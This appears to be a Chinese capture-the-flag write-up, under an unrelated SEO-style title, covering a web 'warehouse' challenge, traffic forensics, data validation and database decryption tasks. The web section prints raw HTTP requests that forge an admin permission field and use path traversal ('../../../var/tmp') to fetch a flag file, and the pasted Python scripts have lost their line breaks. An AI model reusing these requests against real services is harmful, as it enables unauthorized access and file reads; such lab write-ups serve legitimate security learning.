扬中营销网站建设关键词搜索引擎工具

写在前面：
好久不见，这里是贝塔贝塔（好长时间没喊过的口号，也有很多文章夭折了，管挖不管埋
好久没有打比赛了[没错，我是懒狗]
最近在摸鱼王者ing

简单的仓库

队友做的web捏

注册获取VIP功能

POST /api/recharge HTTP/1.1Host: eci-2ze75am5axzh4dfots3n.cloudeci1.ichunqiu.comContent-Length: 66User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36Content-Type: application/jsonAccept: */*Origin: http://eci-2ze75am5axzh4dfots3n.cloudeci1.ichunqiu.comReferer: http://eci-2ze75am5axzh4dfots3n.cloudeci1.ichunqiu.com/warehouseAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: session=eyJ1c2VyIjoiMTIzNDU2In0.Z944fA.fo3H4bnB35ERk3kD5upqqh68m-EConnection: close{"amount":"111111111111","username":"123456","permission":"admin"}

根据admin下的readme.txt提示获取flag

GET /download/flag.txt?user=../../../var/tmp HTTP/1.1Host: eci-2ze75am5axzh4dfots3n.cloudeci1.ichunqiu.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://eci-2ze75am5axzh4dfots3n.cloudeci1.ichunqiu.com/warehouseAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: session=eyJwZXJtaXNzaW9uIjoidmlwIiwidXNlciI6IjEyMzQ1NiJ9.Z944lw.hy-pycBaMUDSN5N_qjUjaKo8P7kConnection: close

异常行为溯源

打开流量包发现是tcp，有data部分，使用tshark提取这个部分，并使用脚本解密

import base64import jsonimport binasciidef process_file(input_file_path, output_file_path):with open(input_file_path, 'r') as file:​    lines = file.readlines()with open(output_file_path, 'wb') as out_file:​    for line in lines:​      line = line.strip()​      if not line:​        continue​      try:​        hex_data = bytes.fromhex(line)​        \# 处理Base64填充问题​        padding = len(hex_data) % 4​        if padding:​          hex_data += b'=' * (4 - padding)​        base64_decoded = base64.b64decode(hex_data)​        try:​          data = json.loads(base64_decoded)​          msg = data.get('msg')​          if msg:​            msg_decoded = base64.b64decode(msg)​            out_file.write(msg_decoded)​        except json.JSONDecodeError:​          out_file.write(base64_decoded)​      except (ValueError, binascii.Error, base64.binascii.Error) as e:​        print(f"处理过程中出现错误: {e}，当前行: {line}")if __name__ == "__main__":input_file = 'data.txt'output_file = 'log'process_file(input_file, output_file)

之后md5访问次数最多的ip提交即可

数据校验

下载文件，分离十条数据例子使用ai写脚本

import pandas as pdimport reimport hashlibimport ipaddressimport base64from ecdsa import VerifyingKey, SECP256k1import os\# 读取文件df = pd.read_csv('./data.csv')\# 检查 UserName 格式def check_username_format(username):return bool(re.match(r'User-\w+', username))\# 验证 MD5 值def verify_md5(input_str, md5_check):md5_hash = hashlib.md5(input_str.encode()).hexdigest()return md5_hash == md5_check\# 检查 Password 字符类型def check_password_characters(password):return bool(re.match(r'^[A-Za-z0-9]+$', password))\# 检查 IP 地址合法性def check_ip(ip):try:​    ipaddress.ip_address(ip)​    return Trueexcept ValueError:​    return False\# 验证 ECDSA 签名def verify_ecdsa_signature(username, signature, serial_number):public_key_path = os.path.join('./ecdsa-key/', f'{serial_number}.pem')if not os.path.exists(public_key_path):​    \#print(1)​    return Falsewith open(public_key_path, 'rb') as key_file:​    vk = VerifyingKey.from_pem(key_file.read())​    \#print(vk)try:​    \# 对 Base64 编码的签名进行解码​    decoded_signature = base64.b64decode(signature)​    vk.verify(decoded_signature, username.encode())​    return Trueexcept Exception as e:​    \#print(21)​    \#print(e)​    return False\# 进行各项检查df['UserName_Format_Correct'] = df['UserName'].apply(check_username_format)df['UserName_MD5_Correct'] = df.apply(lambda row: verify_md5(row['UserName'], row['UserName_Check']), axis=1)df['Password_Characters_Correct'] = df['Password'].apply(check_password_characters)df['Password_MD5_Correct'] = df.apply(lambda row: verify_md5(row['Password'], row['Password_Check']), axis=1)df['IP_Correct'] = df['IP'].apply(check_ip)df['Signature_Correct'] = df.apply(lambda row: verify_ecdsa_signature(row['UserName'], row['Signature'], row['Serial_Number']), axis=1)\# 找出有一条为 false 的行invalid_rows = df[~(df['UserName_Format_Correct'] & df['UserName_MD5_Correct'] &​          df['Password_Characters_Correct'] & df['Password_MD5_Correct'] &​          df['IP_Correct'] & df['Signature_Correct'])]print(invalid_rows)\# 提取这些行的 Serial_Numberinvalid_serial_numbers = invalid_rows['Serial_Number'].tolist()\# 按从小到大排序invalid_serial_numbers.sort()\# 打印 Serial_Numberprint("不合规的 Serial_Number:")for num in invalid_serial_numbers:print(num)\# 用 _ 连接joined_numbers = '_'.join(map(str, invalid_serial_numbers))\# 计算 MD5md5_result = hashlib.md5(joined_numbers.encode()).hexdigest()\# 生成 flagflag = f'flag{{{md5_result}}}'print(flag)

Strange_Database

下载文件分析发现是db数据库文件和私钥文件
找一个在线的先简单测试一下解密过程

└─$ openssl rsautl -decrypt -oaep -in 1.txt -out in_e_d.txt -inkey OAEP-0-tycQQe.pem
Enter pass phrase for OAEP-0-tycQQe.pem:

在本地使用openssl可以，那么训练ai 调用系统命令解码

import os
import base64
import subprocess
import sqlite3def decrypt_with_openssl(encrypted_data, private_key_path, private_key_password):try:# 进行 Base64 解码decoded_data = base64.b64decode(encrypted_data)# 构建 openssl 命令command = ["openssl","rsautl","-decrypt","-oaep","-inkey",private_key_path,"-passin",f"pass:{private_key_password}"]# 执行命令result = subprocess.run(command, input=decoded_data, capture_output=True)if result.returncode == 0:return result.stdout.decode("utf-8")else:print(f"Decryption failed with error: {result.stderr.decode('utf-8')}")return Noneexcept Exception as e:print(f"An error occurred during decryption: {e}")return Nonedef process_db_file(db_path, private_key_path, private_key_password):try:# 连接到 SQLite 数据库conn = sqlite3.connect(db_path)cursor = conn.cursor()# 查询所需字段的数据cursor.execute("SELECT Type, Name, Password, Remark FROM accounts")rows = cursor.fetchall()conn.close()decrypted_rows = []for row in rows:decrypted_row = []for field in row:if field:decrypted_field = decrypt_with_openssl(field, private_key_path, private_key_password)decrypted_row.append(decrypted_field if decrypted_field else field)else:decrypted_row.append(field)decrypted_rows.append(decrypted_row)# 生成输出文件路径output_filename = os.path.splitext(os.path.basename(db_path))[0] + "_decrypted.csv"output_path = os.path.join(os.path.dirname(db_path), output_filename)# 将解密后的数据写入 CSV 文件with open(output_path, "w", newline="", encoding="utf-8") as csvfile:for row in decrypted_rows:csvfile.write(",".join([str(field) if field else "" for field in row]) + "\n")print(f"Decrypted data written to {output_path}")except sqlite3.Error as e:print(f"SQLite error: {e}")except Exception as e:print(f"An unexpected error occurred: {e}")def main():key_dir = "key"database_dir = "database"# 遍历 key 目录下的私钥文件for key_file in os.listdir(key_dir):if key_file.startswith("OAEP-") and key_file.endswith(".pem"):parts = key_file.split("-")id_part = parts[1]private_key_password = parts[2].replace(".pem", "")private_key_path = os.path.join(key_dir, key_file)db_file = f"database-{id_part}.db"db_path = os.path.join(database_dir, db_file)if os.path.exists(db_path):process_db_file(db_path, private_key_path, private_key_password)if __name__ == "__main__":main()

使用cat合并文件查看解密内容，发现有key和enc两个出现次数非常少的关键词，

使用grep匹配并按照文件顺序拼接remark列，用key解密enc，经过一顿尝试发现是rc4